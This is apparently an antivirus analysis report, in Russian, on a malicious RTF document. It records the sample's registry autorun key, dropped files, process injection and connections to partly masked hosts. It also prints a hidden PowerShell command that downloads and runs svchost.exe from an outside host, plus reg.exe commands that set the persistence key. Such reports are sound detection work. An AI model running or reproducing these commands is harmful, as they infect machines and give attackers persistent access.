Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows] 'Load' = '%ALLUSERSPROFILE%\svchost.exe'
Вредоносные функции
Загружает и запускает на исполнение
- http://kq#.ugo.si/svchost.exe как %appdata%\svchost.exe
Внедряет код в
следующие системные процессы:
- %WINDIR%\syswow64\cmd.exe
следующие пользовательские процессы:
- svchost.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abdtfhghgdghghœ.sct
- %APPDATA%\svchost.exe
- <Текущая директория>\~wrd0000.tmp
- %ALLUSERSPROFILE%\svchost.exe
Удаляет следующие файлы
- %TEMP%\abdtfhghgdghghœ.sct
Изменяет следующие файлы
Подменяет следующие файлы
- <PATH_SAMPLE>.rtf
Самоудаляется.
Сетевая активность
Подключается к
- 'kq#.ugo.si':80
- 'by#.z86.ru':5200
UDP
- DNS ASK kq#.ugo.si
- DNS ASK by#.z86.ru
Другое
Создает и запускает на исполнение
- '%APPDATA%\svchost.exe'
- '%ALLUSERSPROFILE%\svchost.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kq#.ugo.si/svchost.exe','%APPDATA%\svchost.exe');Start-Process '%APPDA...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "%ALLUSERSPROFILE%\svchost.exe"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "%ALLUSERSPROFILE%\svchost.exe"
- '%WINDIR%\syswow64\reg.exe' ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "%ALLUSERSPROFILE%\svchost.exe"
- '%WINDIR%\syswow64\cmd.exe'
